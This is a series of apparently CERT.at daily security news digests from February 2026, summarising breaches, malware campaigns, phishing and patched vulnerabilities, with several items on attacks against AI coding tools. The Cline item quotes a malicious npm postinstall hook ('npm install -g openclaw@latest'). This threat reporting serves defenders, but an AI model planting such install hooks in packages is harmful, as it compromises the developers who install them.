Marquis Software Solutions has filed a lawsuit against SonicWall, accusing the cybersecurity company of gross negligence and misrepresentation that allegedly led to a ransomware attack disrupting operations at 74 U.S. banks.

https://www.bleepingcomputer.com/news/security/marquis-sues-sonicwall-over-backup-breach-that-led-to-ransomware-attack/

Chinese cyberspies breached dozens of telecom firms, govt agencies

Googles Threat Intelligence Group (GTIG), Mandiant, and partners disrupted a global espionage campaign attributed to a suspected Chinese threat actor that used SaaS API calls to hide malicious traffic in attacks targeting telecom and government networks.

https://www.bleepingcomputer.com/news/security/chinese-cyberspies-breached-dozens-of-telecom-firms-govt-agencies/

UAC-0050 Targets European Financial Institution With Spoofed Domain and RMS Malware

A Russia-aligned threat actor has been observed targeting a European financial institution as part of a social engineering attack to likely facilitate intelligence gathering or financial theft, signaling a possible expansion of the threat actors targeting beyond Ukraine and into entities supporting the war-torn nation.

https://thehackernews.com/2026/02/uac-0050-targets-european-financial.html

RoguePilot Flaw in GitHub Codespaces Enabled Copilot to Leak GITHUB_TOKEN

A vulnerability in GitHub Codespaces could have been exploited by bad actors to seize control of repositories by injecting malicious Copilot instructions in a GitHub issue. The artificial intelligence (AI)-driven vulnerability has been codenamed RoguePilot by Orca Security. It has since been patched by Microsoft following responsible disclosure.

https://thehackernews.com/2026/02/roguepilot-flaw-in-github-codespaces.html

Malicious NuGet Packages Stole ASP.NET Data; npm Package Dropped Malware

Cybersecurity researchers have discovered four malicious NuGet packages that are designed to target ASP.NET web application developers to steal sensitive data. The campaign, discovered by Socket, exfiltrates ASP.NET Identity data, including user accounts, role assignments, and permission mappings, as well as manipulates authorization rules to create persistent backdoors in victim applications.

https://thehackernews.com/2026/02/malicious-nuget-packages-stole-aspnet.html

Spyware kann Kamera- und Mikrofonanzeige beim iPhone abdrehen

Eigentlich sollte man bei jeder iOS-App sehen können, dass Kamera- oder Mikrofonaufzeichnung laufen. Predator, ein Spionageprogramm, hackt diese aber.

https://www.heise.de/news/Spyware-kann-Kamera-und-Mikrofonanzeige-beim-iPhone-abdrehen-11188076.html

Best Western Hotels warnt vor Phishing-Attacken

Betrüger haben offenbar Zugang zu aktuellen Buchungsdaten von Best Western Hotels. Das Unternehmen warnt vor einer Phishingwelle.

https://www.heise.de/news/Best-Western-Hotels-warnt-vor-Phishing-Attacken-11188923.html

Der Cloudspeicher ist voll?! Was sich wirklich hinter den Warnungen verbirgt

Wenn dubiose E-Mails und hartnäckige PopUp-Fenster vor einem vollen Cloudspeicher warnen, ist allerhöchste Vorsicht angebracht. Während in manchen Fällen real existierende Softwareanbieter ein kostspieliges Abo unter die Leute bringen wollen, verstecken sich hinter anderen Varianten Kriminelle, die es auf die Kontodaten ihrer Opfer abgesehen haben.

https://www.watchlist-internet.at/news/cloudspeicher-ist-voll/

Phishing operation with links to Russia, Armenia compromised Western cargo companies, researchers find

Over a five-month period, the group, dubbed Diesel Vortex, stole more than 1,600 login credentials from accounts at logistics platforms, which allowed thieves to intercept and divert freight shipments and commit check fraud.

https://therecord.media/phishing-operation-russia-armenia-targeting-us-european-cargo

Caught in the Hook: RCE and API Token Exfiltration Through Claude Code Project Files | CVE-2025-59536 | CVE-2026-21852

Check Point Research has discovered critical vulnerabilities in Anthropic-s Claude Code that allow attackers to achieve remote code execution and steal API credentials through malicious project configurations. The vulnerabilities exploit various configuration mechanisms including Hooks, Model Context Protocol (MCP) servers, and environment variables -executing arbitrary shell commands and exfiltrating Anthropic API keys when users clone and open untrusted repositories.

https://research.checkpoint.com/2026/rce-and-api-token-exfiltration-through-claude-code-project-files-cve-2025-59536/

2026 GreyNoise State of the Edge Report: Where Attacks Concentrate and Defenses Fall Short

GreyNoise analyzed 2.97 billion malicious sessions over 162 days - and the patterns challenge assumptions about where edge defenses are strongest. From VPN targeting to infrastructure concentration to attackers rapidly rotating through fresh IPs, new research quantifies where the gaps are and what to do about it. Read the full findings.

https://www.greynoise.io/blog/2026-greynoise-state-of-the-edge-report-where-attacks-concentrate-defenses-fall-short

Unmasking Agent Tesla: A Deep Dive into a Multi-Stage Campaign

Agent Tesla remains one of the most persistent threats in the cyber landscape today. It allows even low-skilled threat actors to harvest sensitive data through a highly sophisticated delivery pipeline. This research blog breaks down a recent multi-stage infection chain that utilizes a blend of phishing, obfuscated and encrypted scripts, and advanced in-memory execution and evasion techniques.

https://www.fortinet.com/blog/threat-research/unmasking-agent-tesla-deep-dive-into-multi-stage-campaign

CVE-2025-59201 - Network Connection Status Indicator (NCSI) EoP

It-s been a while since I last dug into a Patch Tuesday release. With an extraordinarily high number of 177 CVEs, including 6 that were either already public or exploited in the wild, the October 2025 one seemed like a good opportunity to get back at it. The one I ended up investigating in depth was CVE-2025-59201, an elevation of privilege in the -Network Connection Status Indicator-.

https://itm4n.github.io/cve-2025-59201-ncsi-eop/

Vulnerabilities

Cisco Catalyst SD-WAN Vulnerabilities

Multiple vulnerabilities in Cisco Catalyst SD-WAN Manager, formerly SD-WAN vManage, could allow an attacker to access an affected system, elevate privileges to root, gain access to sensitive information, and overwrite arbitrary files. For more information about these vulnerabilities, see the Details section of this advisory. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-authbp-qwCX8D4v

CISA and Partners Release Guidance for Ongoing Global Exploitation of Cisco SD-WAN Systems

The purpose of this Alert is to provide resources for organizations with Cisco Software-Defined Wide-Area Networking (SD-WAN) systems, including Federal Civilian Executive Branch (FCEB) agencies, to address ongoing exploitation of multiple vulnerabilities. Notably, the Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-20127 and CVE-2022-20775 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 25, 2026.

https://www.cisa.gov/news-events/alerts/2026/02/25/cisa-and-partners-release-guidance-ongoing-global-exploitation-cisco-sd-wan-systems

Zyxel warns of critical RCE flaw affecting over a dozen routers

Taiwan networking provider Zyxel has released security updates to address a critical vulnerability affecting over a dozen router models that can allow unauthenticated attackers to gain remote command execution on unpatched devices.

https://www.bleepingcomputer.com/news/security/zyxel-warns-of-critical-rce-flaw-affecting-over-a-dozen-routers/

Schadcode-Lücken in Dell Repository Manager, Wyse Management Suite geschlossen

Dells Fernwartungstools Repository Manager und Wyse Management Suite sind verwundbar. Sicherheitsupdates schließen mehrere Lücken.

https://www.heise.de/news/Schadcode-Luecken-in-Dell-Repository-Manager-Wyse-Management-Suite-geschlossen-11188796.html

Drupal UI Icons - Critical - Cross-site Scripting - SA-CONTRIB-2026-010

https://www.drupal.org/sa-contrib-2026-010

LWN: Security updates for Wednesday

https://lwn.net/Articles/1060185/

Tageszusammenfassung - 24.02.2026

2026-02-24T18:08:06Z

End-of-Day report

Timeframe: Montag 23-02-2026 18:00 - Dienstag 24-02-2026 18:00 Handler: Guenes Holler Co-Handler: n/a

News

Disovery is not the bottleneck!

There is a seductive logic to the current surge of optimism around AI-supported vulnerability discovery - a logic that is entirely based on a fundamental misunderstanding of the situation at hand.

https://bytesandborscht.com/disovery-is-not-the-bottleneck/

Microsoft beendet Unterstützung für Windows-Versionen aus 2016

Windows-Versionen aus 2016 erhalten in Kürze keinen Support mehr. Erweiterte Sicherheits-Updates (ESU) sind jedoch in Planung.

https://www.heise.de/news/Microsoft-beendet-Unterstuetzung-fuer-Windows-Versionen-aus-2016-11187147.html

FinanzOnline-Phishing: Krypto- und Unternehmensdaten im Visier

Eine neue Variante des Phishing-Klassikers im Namen des Finanzministeriums macht die Runde. Sie zielt neben klassischen Adress- und Bankdaten auf weitere sensible Informationen ab. Kriminelle wollen alles über mögliche Krypto-Bestände ihrer Opfer erfahren und erkundigen sich zusätzlich nach etwaigen Unternehmensdetails.

https://www.watchlist-internet.at/news/finanzonline-phishing-krypto-unternehmensdaten/

Vulnerabilities

40 Sicherheitslücken in ImageMagick geschlossen

Die Bildbearbeitungssoftware ImageMagick ist an mehreren Stellen verwundbar. Sicherheitspatches stehen zur Installation bereit.

https://heise.de/-11186935

Critical SolarWinds Serv-U flaws offer root access to servers

SolarWinds has released security updates to patch four critical Serv-U remote code execution vulnerabilities that could grant attackers root access to unpatched servers.

https://www.bleepingcomputer.com/news/security/critical-solarwinds-serv-u-flaws-offer-root-access-to-servers/

LWN Security updates for Tuesday

https://lwn.net/Articles/1060018/

Tageszusammenfassung - 23.02.2026

2026-02-23T19:13:23Z

End-of-Day report

Timeframe: Freitag 20-02-2026 18:00 - Montag 23-02-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Incident Reporting: EU-Wide Statistics

At the last CSIRTs Network meeting we got treated to a powerpoint versions of the statistics that ENISA publishes under https://ciras.enisa.europa.eu/ The mathematician inside me was not impressed, and as I-m prone to do, I did not withhold my opinion. This blog post explains why I-m so unhappy with ENISA-s analysis.

https://www.cert.at/en/blog/2026/2/incident-reporting-eu-wide-statistics

Predator spyware hooks iOS SpringBoard to hide mic, camera activity

US-sanctioned surveillance firm Intellexa developed the Predator commercial spyware and delivered it in attacks that exploited Apple and Chrome zero-day flaws and through 0-click infection mechanisms. [..] The malware does not exploit any iOS vulnerability but leverages previously obtained kernel-level access to hijack system indicators that would otherwise expose its surveillance operation.

https://www.bleepingcomputer.com/news/security/predator-spyware-hooks-ios-springboard-to-hide-mic-camera-activity/

Amazon: AI-assisted hacker breached 600 Fortinet firewalls in 5 weeks

A new report by CJ Moses, CISO of Amazon Integrated Security, says that the hacking campaign occurred between January 11 and February 18, 2026, and did not rely on any exploits to breach Fortinet firewalls. Instead, the threat actor targeted exposed management interfaces and weak credentials that lacked MFA protection, then used AI to help automate access to other devices on the breached network.

https://www.bleepingcomputer.com/news/security/amazon-ai-assisted-hacker-breached-600-fortigate-firewalls-in-5-weeks/

CarGurus: Have I Been Pwned integriert Daten von 12,5 Millionen Kunden

Have I Been Pwned ist um 12,5 Millionen Einträge von CarGurus-Nutzern und -Nutzerinnen reicher. Die haben ShinyHunters geklaut. [..] Zudem sind Nutzerkonten-IDs enthalten, Daten aus finanziellen Vorprüfungen, Händlerkonten sowie Abo-Informationen. Hunt führt weiter aus, dass auch Namen, Telefonnummern, Anschriften und IP-Adressen sowie der Ausgang von Finanzierungsanfragen betroffen sind.

https://www.heise.de/news/CarGurus-ShinyHunters-kopieren-Datensaetze-von-12-5-Millionen-Nutzern-11185847.html

-Starkiller- Phishing Service Proxies Real Login Pages, MFA

Most phishing websites are little more than static copies of login pages for popular online destinations, and they are often quickly taken down by anti-abuse activists and security firms. But a stealthy new phishing-as-a-service offering lets customers sidestep both of these pitfalls: It uses cleverly disguised links to load the target brand-s real website, and then acts as a relay between the victim and the legitimate site - forwarding the victim-s username, password and multi-factor authentication (MFA) code to the legitimate site and returning its responses.

https://krebsonsecurity.com/2026/02/starkiller-phishing-service-proxies-real-login-pages-mfa/

Hackers Hide Pulsar RAT Inside PNG Images in New NPM Supply Chain Attack

Cybersecurity researchers at Veracode reveal a typosquatting attack that disguises Pulsar RAT as images to bypass Windows security and antivirus programs.

https://hackread.com/hackers-pulsar-rat-png-images-npm-supply-chain-attack/

Roundcube Webmail: Angriffe auf Sicherheitslücken laufen

Die zweite Sicherheitslücke wurde kurz vor Weihnachten bekannt. Sie ermöglicht Cross-Site-Scripting-Angriffe. Die Schwachstelle betrifft die Verarbeitung des -Animate--Tag in SVG-Dateien. [..] IT-Verantwortliche sollten ihre Systeme absichern, indem sie zumindest auf die fehlerkorrigierten Versionen 1.5.12 und 1.6.12 installieren.

https://heise.de/-11185535

SANDWORM_MODE: Shai-Hulud-Style npm Worm Hijacks CI Workflows and Poisons AI Toolchains

An active Shai-Hulud-like supply chain worm campaign spreads via typosquatting and AI toolchain poisoning, across at least 19 malicious npm packages and linked to two npm aliases. The sample retains Shai-Hulud hallmarks and adds GitHub API exfiltration with DNS fallback, hook-based persistence, SSH propagation fallback, MCP server injection with embedded prompt injection targeting AI coding assistants, and LLM API Key harvesting.

https://socket.dev/blog/sandworm-mode-npm-worm-ai-toolchain-poisoning

Vulnerabilities

Pi-hole: Update schließt Sicherheitslücken und liefert mehr Performance

Zum einen hätten als Admin angemeldete Angreifer eine -Stored HTML-Injection--Schwachstelle missbrauchen können, um HTML-Code einzuschleusen, der bei der Anzeige der DNS-Eintragstabelle angezeigt wird (CVE-2026-26952, CVSS 5.4, Risiko -mittel-). Zum anderen gelingt dies auch auf der API-Einstellungswebseite (CVE-2026-26953, CVSS 5.4, Risiko -mittel-).

https://heise.de/-11185637

LWN: Security updates for Monday

https://lwn.net/Articles/1059864/

Tageszusammenfassung - 20.02.2026

2026-02-20T18:41:34Z

End-of-Day report

Timeframe: Donnerstag 19-02-2026 18:00 - Freitag 20-02-2026 18:00 Handler: Guenes Holler Co-Handler: n/a

News

ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT RAT

Cybersecurity researchers have disclosed details of a new ClickFix campaign that abuses compromised legitimate sites to deliver a previously undocumented remote access trojan (RAT) called MIMICRAT (aka AstarionRAT).

https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html

PromptSpy läutet mit GenAI die Ära der Android-Bedrohungen ein

ESET-Forscher entdecken PromptSpy, die erste bekannte Android-Malware, die generative KI in ihrem Ausführungsablauf nutzt.

https://www.welivesecurity.com/de/eset-research/promptspy-lautet-mit-genai-die-ara-der-android-bedrohungen-ein/

Windows-Editor: Details zur Markdown-Sicherheitslücke

Die Patchday-Updates schließen eine Lücke im Windows-Editor, die das Einschleusen von Schadcode erlaubt. Nun gibt es Details zum Leck.

https://heise.de/-11183516

Crims create fake remote management vendor that actually sells a RAT

Researchers at Proofpoint late last month uncovered what they describe as a "weird twist" on the growing trend of criminals abusing remote monitoring and management software (RMM) as their preferred attack tools.

https://go.theregister.com/feed/www.theregister.com/2026/02/19/rmm_rat_trustconnect/

VShell and SparkRAT Observed in Exploitation of BeyondTrust Critical Vulnerability (CVE-2026-1731)

On Feb. 6, 2026, BeyondTrust released a security advisory regarding CVE-2026-1731. BeyondTrust is an identity and access management platform. This specific vulnerability involves a pre-authentication remote code execution (RCE) issue within BeyondTrust remote support software. It could allow attackers to execute operating system commands in the context of the site user, which may lead to system compromise, including unauthorized access, data exfiltration and service disruption.

https://unit42.paloaltonetworks.com/beyondtrust-cve-2026-1731/

Vulnerabilities

Atlassian-Sicherheitsupdates: Bamboo und Confluence sind verwundbar

Um zu verhindern, dass Angreifer mehrere Sicherheitslücken in Atlassian Bamboo Data Center and Server, Confluence Data Center and Server sowie Crowd Data Center und Server ausnutzen, sollten Admins die nun verfügbaren Patches umgehend installieren.

https://heise.de/-11183534

Zahlreiche Kernel-Lücken in Dell PowerProtect Data Manager geschlossen

Dells Backuplösung PowerProtect Data Manager ist unter anderem für Schadcode-Attacken anfällig. Sicherheitspatches stehen zum Download bereit.

https://heise.de/-11184164

LWN Security updates for Friday

https://lwn.net/Articles/1059638/

Tageszusammenfassung - 19.02.2026

2026-02-19T19:17:58Z

End-of-Day report

Timeframe: Mittwoch 18-02-2026 18:00 - Donnerstag 19-02-2026 18:00 Handler: Guenes Holler Co-Handler: Felician Fuchs

News

Lawful access to encrypted data: General Considerations

Last week, I wrote a blog post on why the problem of lawful access to encrypted data is so tricky, this week I want to continue with a discussion on the general considerations you should keep in mind when thinking about this topic. Important note: I think LE is well aware of these considerations and agrees with most of my conclusions.

https://www.cert.at/en/blog/2026/2/lawful-access-to-encrypted-data-general-considerations

Hackers target Microsoft Entra accounts in device code vishing attacks

Threat actors are targeting technology, manufacturing, and financial organizations in campaigns that combine device code phishing and voice phishing (vishing) to abuse the OAuth 2.0 Device Authorization flow and compromise Microsoft Entra accounts.

https://www.bleepingcomputer.com/news/security/hackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks/

How infostealers turn stolen credentials into real identities

Infostealer dumps increasingly tie stolen credentials to real identities, linking usernames, cookies, and behavior across personal and enterprise accounts. Specops explains how analyzing 90,000 dumps shows reuse fuels enterprise risk and how continuous AD scanning disrupts that cycle.

https://www.bleepingcomputer.com/news/security/how-infostealers-turn-stolen-credentials-into-real-identities/

Arkanix Stealer: a C++ & Python infostealer

Kaspersky researchers analyze a C++ and Python stealer dubbed "Arkanix Stealer", which was active for several months, targeted wide range of data, was distributed as MaaS and offered referral program to its partners.

https://securelist.com/arkanix-stealer/119006/

Frankreich: Angreifer griffen auf Daten von 1,2 Millionen Bankkonten zu

In Frankreich haben sich Angreifer Zugriff auf eine nationale Datenbank verschafft und Daten zu 1,2 Millionen Bankkonten ausgelesen.

https://www.heise.de/news/Frankreich-Angreifer-griffen-auf-Daten-von-1-2-Millionen-Bankkonten-zu-11182323.html

Die Uhr tickt: Frist zur NIS2-Registrierung beim BSI läuft am 6. März 2026 ab

Der TÜV SÜD warnt, dass in zwei Wochen die Registrierungsfrist beim BSI für NIS2-pflichtige Unternehmen endet. Betroffen sind rund 29.000 deutsche Unternehmen.

https://www.heise.de/news/Die-Uhr-tickt-Frist-zur-NIS2-Registrierung-beim-BSI-laeuft-am-6-Maerz-2026-ab-11182499.html

Betrugsmasche: Falsche -Gemini--Chatbots verkaufen falschen -Google Coin-

Eine neue Betrugsmasche beruht auf angepassten KI-Chatbots. Diese drängen Opfer dazu, wertlose Kryptowährungen zu kaufen.

https://www.heise.de/news/Betrugsmasche-Falsche-Gemini-Chatbots-verkaufen-falschen-Google-Coin-11182685.html

Kubernetes project issues warning on Ingress NGINX retirement

The Kubernetes project is urging organizations to migrate away from Ingress NGINX before its retirement in March 2026, with new high-severity CVEs underscoring the urgency.

https://securitylabs.datadoghq.com/articles/kubernetes-ingress-nginx-retirement-warning/

Cline CLI npm Package Compromised via Suspected Cache Poisoning Attack

On February 17, 2026, an unauthorized party used a compromised npm publish token to push cline@2.3.0 to the npm registry. Cline is a popular AI coding agent CLI in the developer ecosystem, with around 90,000 weekly downloads from npm. The malicious version contained a modified package.json with an added postinstall script: npm install -g openclaw@latest.

https://socket.dev/blog/cline-cli-npm-package-compromised-via-suspected-cache-poisoning-attack

Vulnerabilities

Critical infra Honeywell CCTVs vulnerable to auth bypass flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning of a critical vulnerability in multiple Honeywell CCTV products that allows unauthorized access to feeds or account hijacking.

https://www.bleepingcomputer.com/news/security/critical-infra-honeywell-cctvs-vulnerable-to-auth-bypass-flaw/

Grandstream GXP1600 VoIP Phones Exposed to Unauthenticated Remote Code Execution

Cybersecurity researchers have disclosed a critical security flaw in the Grandstream GXP1600 series of VoIP phones that could allow an attacker to seize control of susceptible devices.The vulnerability, tracked as CVE-2026-2329, carries a CVSS score of 9.3 out of a maximum of 10.0.

https://thehackernews.com/2026/02/grandstream-gxp1600-voip-phones-exposed.html

Nvidia-KI-Tools Megatron Bridge und NeMo Framework als Einfallstor für Angreifer

Nvidias Entwickler haben unter anderem Schadcode-Schlupflöcher in Megatron Bridge und NeMo Framework geschlossen.

https://www.heise.de/news/Nvidia-KI-Tools-Megatron-Bridge-und-NeMo-Framework-als-Einfallstor-fuer-Angreifer-11182013.html

Mozilla Firefox Issues Emergency Patch for Heap Buffer Overflow in Firefox v147

Mozilla has released an out-of-band security update to address a critical vulnerability affecting its browser. The update, issued as Firefox v147.0.4, resolves a high-impact Heap buffer overflow flaw in the libvpx video codec library. The issue is tracked under CVE-2026-2447 and was identified by security researcher jayjayjazz.

https://thecyberexpress.com/firefox-v147-cve-2026-2447/

LWN Security updates for Thursday

https://lwn.net/Articles/1059500/

Tageszusammenfassung - 18.02.2026

2026-02-18T18:25:57Z

End-of-Day report

Timeframe: Dienstag 17-02-2026 18:00 - Mittwoch 18-02-2026 18:00 Handler: Guenes Holler Co-Handler: Michael Schlagenhaufer

News

Data breach at fintech firm Figure affects nearly 1 million accounts

Hackers have stolen the personal and contact information of nearly 1 million accounts after breaching the systems of Figure Technology Solutions, a self-described blockchain-native financial technology company.

https://www.bleepingcomputer.com/news/security/data-breach-at-fintech-firm-figure-affects-nearly-1-million-accounts/

Microsoft: Anti-phishing rules mistakenly blocked emails, Teams messages

Microsoft says an Exchange Online issue that mistakenly quarantined legitimate emails last week was triggered by faulty heuristic detection rules designed to block credential phishing campaigns.

https://www.bleepingcomputer.com/news/microsoft/microsoft-anti-phishing-rules-mistakenly-blocked-emails-teams-messages/

"Keine alltägliche Dimension": AWS kann DDoS-Attacke auf die Bahn nicht abfangen

Einen Tag lang ist es Hackern gelungen, den DB Navigator und bahn.de lahmzulegen. Die geschäftskritischen Systeme liegen bei Amazon Web Services.

https://www.golem.de/news/die-groessere-kante-aws-kann-ddos-attacke-auf-die-bahn-nicht-abfangen-2602-205569.html

Researchers Show Copilot and Grok Can Be Abused as Malware C2 Proxies

Cybersecurity researchers have disclosed that artificial intelligence (AI) assistants that support web browsing or URL fetching capabilities can be turned into stealthy command-and-control (C2) relays, a technique that could allow attackers to blend into legitimate enterprise communications and evade detection.

https://thehackernews.com/2026/02/researchers-show-copilot-and-grok-can.html

Your AI-generated password isnt random, it just looks that way

Seemingly complex strings are actually highly predictable, crackable within hours Generative AI tools are surprisingly poor at suggesting strong passwords, experts say.

https://www.theregister.com/2026/02/18/generating_passwords_with_llms/

Red Vulns Rising: Examining Chinese National Vulnerability Databases

Learn how the Chinese vulnerability databases (CNVD and CNNVD) compare to CVE, including early disclosures, policy shifts, and data quality differences.

https://www.bitsight.com/blog/chinese-vulnerability-database-analysis-cnvd-cnnvd

Vulnerabilities

Flaws in popular VSCode extensions expose developers to attacks

Vulnerabilities with high to critical severity ratings affecting popular Visual Studio Code (VSCode) extensions collectively downloaded more than 128 million times could be exploited to steal local files and execute code remotely.

https://www.bleepingcomputer.com/news/security/flaws-in-popular-vscode-extensions-expose-developers-to-attacks/

Notepad++ Fixes Hijacked Update Mechanism Used to Deliver Targeted Malware

Notepad++ has released a security fix to plug gaps that were exploited by an advanced threat actor from China to hijack the software update mechanism to selectively deliver malware to targets of interest.

https://thehackernews.com/2026/02/notepad-fixes-hijacked-update-mechanism.html

Microsoft warnt vor kritischer Rechteausweitungslücke in Windows Admin Center

Im Windows Admin Center können Angreifer ihre Rechte ausweiten. Microsoft stuft das als kritisch ein und rät Admins zum Aktualisieren.

https://www.heise.de/news/Microsoft-warnt-vor-kritischer-Rechteausweitungsluecke-in-Windows-Admin-Center-11180525.html

From BRICKSTORM to GRIMBOLT: UNC6201 Exploiting a Dell RecoverPoint for Virtual Machines Zero-Day

Mandiant and Google Threat Intelligence Group (GTIG) have identified the zero-day exploitation of a high-risk vulnerability in Dell RecoverPoint for Virtual Machines, tracked as CVE-2026-22769, with a CVSSv3.0 score of 10.0.

https://cloud.google.com/blog/topics/threat-intelligence/unc6201-exploiting-dell-recoverpoint-zero-day/

Multiple Security-Updates for Splunk DB Connect - February 2026

https://advisory.splunk.com

[R2] Stand-alone Security Patches Available for Tenable Security Center versions 6.5.1, 6.6.0 and 6.7.2: SC-202602.1 + SC-202602.2

https://www.tenable.com/security/tns-2026-06

LWN Security updates for Wednesday

https://lwn.net/Articles/1059333/

Tageszusammenfassung - 17.02.2026

2026-02-17T18:16:42Z

End-of-Day report

Timeframe: Montag 16-02-2026 18:00 - Dienstag 17-02-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Guenes Holler

News

Divide and conquer: how the new Keenadu backdoor exposed links between major Android botnets

Kaspersky experts have uncovered Keenadu, a sophisticated new backdoor targeting tablet firmware as well as system-level and Google Play apps. They also revealed connections between the worlds most prolific Android botnets.

https://securelist.com/keenadu-android-backdoor/118913/

IT-Sicherheitsbehörde CISA im Notbetrieb

Die zum Wochenende ausgelaufene Finanzierung des DHS betrifft auch die IT-Sicherheitsbehörde CISA. Diese befindet sich nun im Notbetrieb.

https://www.heise.de/news/IT-Sicherheitsbehoerde-CISA-im-Notbetrieb-11179136.html

Sicherheitsbedenken: EU-Parlament deaktiviert KI-Tools auf Diensthandys

EU-Abgeordnete und ihre Angestellte können auf dienstlichen Smartphones und Tablets keine KI-Funktionen mehr nutzen. Man wisse zu wenig zur Datensicherheit.

https://heise.de/-11179064

Passwortmanager bieten weniger Schutz als versprochen

Forschende der ETH Zürich haben bei drei populären, cloudbasierten Passwortmanagern gravierende Sicherheitslücken entdeckt. In Tests konnten sie gespeicherte Passwörter einsehen und sogar verändern.

https://ethz.ch/de/news-und-veranstaltungen/eth-news/news/2026/02/passwortmanager-bieten-weniger-schutz-als-versprochen.html

Vulnerabilities

Mehr als 60 Sicherheitsprobleme in KI-Assistent OpenClaw gelöst

Angreifer können im Kontext von OpenClaw unter anderem Schadcode auf Systeme schieben und ausführen. Sicherheitspatches sind verfügbar.

https://heise.de/-11179150

CleanTalk WordPress Plugin Vulnerability Puts 200,000 Sites at Risk

A WordPress plugin vulnerability has placed as many as 200,000 websites at potential risk, following the disclosure of a severe flaw in the CleanTalk Anti-Spam plugin. The issue, tracked as CVE-2026-1490, carries a CVSS severity rating of 9.8 out of 10 and could allow unauthenticated attackers to install arbitrary plugins, opening the door to remote code execution under certain conditions.

https://thecyberexpress.com/cleantalk-cve-2026-1490/

LWN Security updates for Tuesday

https://lwn.net/Articles/1059176/

Tageszusammenfassung - 16.02.2026

2026-02-16T18:11:58Z

End-of-Day report

Timeframe: Freitag 13-02-2026 18:00 - Montag 16-02-2026 18:00 Handler: Alexander Riepl Co-Handler: Guenes Holler

News

Pastebin comments push ClickFix JavaScript attack to hijack crypto swaps

Threat actors are abusing Pastebin comments to distribute a new ClickFix-style attack that tricks cryptocurrency users into executing malicious JavaScript in their browser, allowing attackers to hijack Bitcoin swap transactions and redirect funds to attacker-controlled wallets.

https://www.bleepingcomputer.com/news/security/pastebin-comments-push-clickfix-javascript-attack-to-hijack-crypto-swaps/

Romo: DJI-Staubsaugerroboter gehackt

Eine Sicherheitslücke im DJI Romo Saugroboter erlaubte den Zugriff auf rund 7.000 Geräte weltweit - inklusive Live-Kameras und Wohnungsgrundrissen.

https://www.golem.de/news/romo-dji-staubsaugerroboter-gehackt-2602-205411.html

Gefälschte E-Mail zur Kryptomeldepflicht: Neue Betrugsmasche im Umlauf

In zahlreichen Postfächern taucht derzeit eine E-Mail auf, die angeblich vom Bundesministerium für Finanzen stammt und eine -dringende Meldepflicht- für Kryptovermögen ankündigt. Selbst Personen ohne Kryptowährungen sollen demnach ein Formular ausfüllen. Die Nachricht wirkt seriös, ist aber eine gut gemachte Phishing-Falle.

https://www.watchlist-internet.at/news/gefaelschte-e-mail-zur-kryptomeldepflicht/

Phishing on the Edge of the Web and Mobile Using QR Codes

We discuss the extensive use of malicious QR codes using URL shorteners, in-app deep links and direct APK downloads to bypass mobile security.The post Phishing on the Edge of the Web and Mobile Using QR Codes appeared first on Unit 42.

https://unit42.paloaltonetworks.com/qr-codes-as-attack-vector/

Vulnerabilities

Sicherheitslücke im Browser: Attacken auf Chrome-Nutzer beobachtet

Eine gefährliche Sicherheitslücke lässt Angreifer Schadcode in Chrome einschleusen. Es reicht der Besuch einer speziell gestalteten Webseite.

https://www.golem.de/news/sicherheitsluecke-im-browser-attacken-auf-chrome-nutzer-beobachtet-2602-205443.html

ClickFix-Attacken nutzen Schadcode in DNS-Antworten

Microsoft hat eine neue Variante der Malware-Verteilung in ClickFix-Angriffen entdeckt. Die Angreifer liefern Schadcode mittels DNS aus.

https://www.heise.de/news/ClickFix-Attacken-nutzen-Schadcode-in-DNS-Antworten-11177592.html

LWN Security updates for Monday

https://lwn.net/Articles/1058989/

Tageszusammenfassung - 13.02.2026

2026-02-13T18:28:16Z

End-of-Day report

Timeframe: Donnerstag 12-02-2026 18:00 - Freitag 13-02-2026 18:00 Handler: Michael Schlagenhaufer Co-Handler: Felician Fuchs

News

Microsoft: New Windows LNK spoofing issues arent vulnerabilities

Today, at Wild West Hackin Fest, security researcher Wietze Beukema disclosed multiple vulnerabilities in Windows LK shortcut files that allow attackers to deploy malicious payloads.

https://www.bleepingcomputer.com/news/microsoft/microsoft-new-windows-lnk-spoofing-issues-arent-vulnerabilities/

Ivanti EPMM Zero-Day Bugs Spark Exploit Frenzy - Again

A handful of European government agencies have been compromised by hackers in recent weeks, thanks to a new round of critical vulnerabilities in an Ivanti product - and it's another grim reminder of the heyday attackers have been having with edge devices.

https://www.darkreading.com/endpoint-security/ivanti-epmm-zero-day-bugs-exploit

37 Millionen Downloads: 287 Chrome-Extensions bei der Spionage erwischt

Forscher haben den Traffic zahlreicher Chrome-Erweiterungen analysiert. 287 davon spionieren für Datenbroker das Surfverhalten aus.

https://www.golem.de/news/37-millionen-downloads-287-chrome-extensions-bei-der-spionage-erwischt-2602-205381.html

Bypassing Administrator Protection by Abusing UI Access

In my last blog post I introduced the new Windows feature, Administrator Protection and how it aimed to create a secure boundary for UAC where one didn-t exist. I described one of the ways I was able to bypass the feature before it was released. In total I found 9 bypasses during my research that have now all been fixed.In this blog post I wanted to describe the root cause of 5 of those 9 issues, specifically the implementation of UI Access, how this has been a long standing problem with UAC that-s been under-appreciated, and how it-s being fixed now.

https://projectzero.google/2026/02/windows-administrator-protection.html

IPFire stellt freie Domain-Blockliste DBL vor

Die IPFire-Entwickler haben mit DBL eine kategorisierte Domain-Blockliste veröffentlicht. Sie soll Malware, Phishing und Tracker blockieren.

https://www.heise.de/news/IPFire-stellt-freie-Domain-Blockliste-DBL-vor-11175994.html

How to find and remove credential-stealing Chrome extensions

Researchers have uncovered 30 Chrome extensions stealing user data. Here-s how to check your browser and remove any malicious extensions step by step.

https://www.malwarebytes.com/blog/news/2026/02/how-to-find-and-remove-credential-stealing-chrome-extensions

Vorsicht, Trojaner! Kursierende Nachrichten zu Urheberrechtsverletzungen sind Fakes!

